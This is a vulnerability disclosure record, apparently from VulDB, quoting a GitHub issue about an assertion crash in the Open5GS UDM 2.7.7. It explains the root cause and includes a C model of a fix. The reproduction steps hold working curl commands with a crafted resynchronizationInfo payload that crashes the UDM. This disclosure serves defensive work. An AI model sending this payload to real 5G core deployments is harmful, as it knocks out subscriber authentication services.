Submission #806249: Open5gs UDM v2.7.7 Denial of Service (info)

Title: Open5gs UDM v2.7.7 Denial of Service
Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Description

UDM aborts when the `nudm-ueau` resynchronization path reaches the downstream `PATCH /nudr-dr/v1/subscription-data/{supi}/authentication-data/authentication-subscription` response handler.

The bug is a state mismatch inside `udm_nudr_dr_handle_subscription_authentication()`. The handler uses a single switch for both:

- `GET authentication-subscription`
- `PATCH authentication-subscription`

but only the `GET` branch initializes:

```c
udm_ue->auth_type = OpenAPI_auth_type_5G_AKA;
```

The resynchronization flow takes the `PATCH` branch directly, then later does:

```c
AuthenticationInfoResult.auth_type = udm_ue->auth_type;
ogs_assert(AuthenticationInfoResult.auth_type);
```

For a fresh UE context, `udm_ue->auth_type` is still zero, so the assertion aborts the whole UDM process.

### Root Cause

- Entry route: `POST /nudm-ueau/v1/{supi}/security-information/generate-auth-data`
- Exact downstream path: `PATCH /nudr-dr/v1/subscription-data/{supi}/authentication-data/authentication-subscription`
- Crash site: `../src/udm/nudr-handler.c:258`
- Root cause family: parser/business-logic mismatch across method-specific state initialization
- Controlling fields: `resynchronizationInfo.rand` and `resynchronizationInfo.auts`

### Steps to Reproduce

This live reproduction used the fake h2c NRF/UDR helper at `/home/ubuntu/open5gs_277/.audit_tmp/udm_fake_nrf.js`, with UDM temporarily pointed at `http://10.33.33.1:18081`.

1. Run the fake helper:

   ```bash
   node /home/ubuntu/open5gs_277/.audit_tmp/udm_fake_nrf.js
   ```

2. Control experiment: send a normal `nudm-ueau` request without `resynchronizationInfo`:

   ```bash
   SUPI=imsi-001011234567900
   curl --http2-prior-knowledge -sS -i -m 8 \
     -X POST "http://10.33.33.10/nudm-ueau/v1/$SUPI/security-information/generate-auth-data" \
     -H 'content-type: application/json' \
     --data '{"servingNetworkName":"5G:mnc000.mcc000.3gppnetwork.org","ausfInstanceId":"fake-ausf"}'
   ```

   In my live run, UDM returned a normal `200` with an authentication vector and stayed up.

3. Malicious experiment: send the same request on a fresh SUPI, but include a valid zero-state resynchronization payload:

   ```bash
   SUPI=imsi-001011234567901
   curl --http2-prior-knowledge -sS -i -m 8 \
     -X POST "http://10.33.33.10/nudm-ueau/v1/$SUPI/security-information/generate-auth-data" \
     -H 'content-type: application/json' \
     --data '{"servingNetworkName":"5G:mnc000.mcc000.3gppnetwork.org","ausfInstanceId":"fake-ausf","resynchronizationInfo":{"rand":"00000000000000000000000000000000","auts":"39352148bb6513d313fa20e98dbc"}}'
   ```

4. Inspect the crash:

   ```bash
   docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}} {{.RestartCount}}' udm
   docker logs udm
   ```

### Logs

```shell
04/15 14:43:39.722: [sbi] INFO: NF Service [nudm-uecm] (../lib/sbi/context.c:1985)
04/15 14:43:39.722: [sbi] INFO: NF Service [nudm-sdm] (../lib/sbi/context.c:1985)
04/15 14:43:39.723: [sbi] INFO: nghttp2_server() [http://udm.open5gs.org]:80 (../lib/sbi/nghttp2-server.c:434)
04/15 14:43:39.723: [app] INFO: UDM initialize...done (../src/udm/app.c:31)
04/15 14:43:39.724: [sbi] ERROR: No NFProfile (../lib/sbi/nnrf-handler.c:44)
04/15 14:43:39.724: [sbi] INFO: [7df13f6a-38d9-41f1-8381-c3b464df73fa] NF registered [Heartbeat:0s] (../lib/sbi/nf-sm.c:341)
04/15 14:43:39.726: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.1:18081] (../lib/sbi/nnrf-handler.c:969)
04/15 14:43:39.726: [sbi] INFO: [sub-1] Subscription created until 2030-01-01T00:00:00Z [duration:117191781000000,validity:117191781.000000,patch:58595890.500000] (../lib/sbi/nnrf-handler.c:888)
04/15 14:43:39.726: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.1:18081] (../lib/sbi/nnrf-handler.c:969)
04/15 14:43:39.726: [sbi] INFO: [sub-1] Subscription created until 2030-01-01T00:00:00Z [duration:117191781000000,validity:117191781.000000,patch:58595890.500000] (../lib/sbi/nnrf-handler.c:888)
04/15 14:43:39.726: [sbi] WARNING: No links (../lib/sbi/nf-sm.c:446)
04/15 14:43:41.713: [sbi] WARNING: Try to discover [nudr-dr] (../lib/sbi/path.c:563)
04/15 14:43:41.716: [sbi] INFO: [fake-udr-control] (NRF-discover) NF registered [type:NULL] (../lib/sbi/nnrf-handler.c:1266)
04/15 14:43:41.716: [sbi] ERROR: [UDR] No instance-level endpoint, client association skipped [id:fake-udr-control] (../lib/sbi/context.c:2056)
04/15 14:43:41.716: [sbi] INFO: [nudr-dr] NFService associated [fake-udr-dr] (../lib/sbi/context.c:2109)
04/15 14:43:41.716: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.1:18082] (../lib/sbi/context.c:2111)
04/15 14:43:41.716: [sbi] INFO: [fake-udr-control] (NF-discover) NF Profile updated [type:UDR validity:30s] (../lib/sbi/nnrf-handler.c:1311)
04/15 14:43:41.716: [udm] INFO: [fake-udr-control] Setup NF Instance [type:UDR] (../src/udm/nnrf-handler.c:89)
04/15 14:43:41.727: [sbi] INFO: [fake-udr-control] Setup NF Instance [type:UDR] (../lib/sbi/path.c:307)
04/15 14:43:41.728: [udm] FATAL: udm_nudr_dr_handle_subscription_authentication: Assertion `AuthenticationInfoResult.auth_type' failed. (../src/udm/nudr-handler.c:258)
04/15 14:43:41.728: [core] FATAL: backtrace() returned 10 addresses (../lib/core/ogs-abort.c:37)
open5gs-udmd(+0x198cb) [0x558ffd6238cb]
open5gs-udmd(+0xb806) [0x558ffd615806]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7fc1b735cabc]
open5gs-udmd(+0x106fb) [0x558ffd61a6fb]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7fc1b735cabc]
open5gs-udmd(+0x6243) [0x558ffd610243]
/usr/local/lib/libogscore.so.2(+0x12b4f) [0x7fc1b734cb4f]
/lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7fc1b6a41ac3]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7fc1b6ad2a84]
```

### Expected behaviour

UDM should initialize `auth_type` for the resynchronization (`PATCH`) path or reject the flow cleanly, instead of asserting on uninitialized state.

### Observed Behaviour

A single crafted resynchronization request causes UDM to crash with exit code `139` after the downstream UDR `PATCH` response is processed.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.
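
The method-specific initialization gap described above, reduced to a self-contained C model with a hardened handler beside it. This is an added example, not Open5GS source: the types, function names and result codes are hypothetical, and `RESULT_WOULD_ABORT` stands in for the `ogs_assert` abort so the model itself keeps running.

```c
#include <stdio.h>

/* Hypothetical model types; not Open5GS definitions. */
enum auth_type { AUTH_NULL = 0, AUTH_5G_AKA = 1 };
enum method { M_GET, M_PATCH };
enum result { RESULT_OK, RESULT_REJECTED, RESULT_WOULD_ABORT };
struct ue_ctx { enum auth_type auth_type; }; /* zero for a fresh UE context */

/* Reported pattern: one switch, only the GET branch sets auth_type. */
enum result handle_as_reported(struct ue_ctx *ue, enum method m) {
    switch (m) {
    case M_GET:
        ue->auth_type = AUTH_5G_AKA;
        return RESULT_OK;
    case M_PATCH:
        /* Stands in for ogs_assert(AuthenticationInfoResult.auth_type). */
        return ue->auth_type ? RESULT_OK : RESULT_WOULD_ABORT;
    }
    return RESULT_REJECTED;
}

/* Hardened: the PATCH branch checks its precondition and fails one request. */
enum result handle_hardened(struct ue_ctx *ue, enum method m) {
    switch (m) {
    case M_GET:
        ue->auth_type = AUTH_5G_AKA;
        return RESULT_OK;
    case M_PATCH:
        /* Error reply for this request only; the process keeps running. */
        return ue->auth_type == AUTH_NULL ? RESULT_REJECTED : RESULT_OK;
    }
    return RESULT_REJECTED;
}

/* Replays handler responses on a fresh context and returns the last result. */
enum result replay(enum result (*h)(struct ue_ctx *, enum method),
                   const enum method *seq, int n) {
    struct ue_ctx ue = { AUTH_NULL };
    enum result r = RESULT_OK;
    for (int i = 0; i < n; i++) r = h(&ue, seq[i]);
    return r;
}

int main(void) {
    const enum method resync[] = { M_PATCH }; /* constructed: PATCH on fresh UE */
    printf("reported=%d hardened=%d\n", replay(handle_as_reported, resync, 1),
           replay(handle_hardened, resync, 1));
    return 0;
}
```

The hardened variant shown takes the "reject the flow cleanly" option from the expected behaviour; initializing `auth_type` on the `PATCH` branch is the other option the report names.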
Source: https://github.com/open5gs/open5gs/issues/4418
User: FrankyLin (UID 94345)
Submitted: 2026-04-16 05:37 (2 months ago)
Moderated: 2026-05-04 17:50 (19 days later)
Status: Accepted
VulDB entry: 360976 [Open5GS up to 2.7.7 authentication-subscription Endpoint /src/udm/nudr-handler.c udm_nudr_dr_handle_subscription_authentication denial of service]
Points: 20
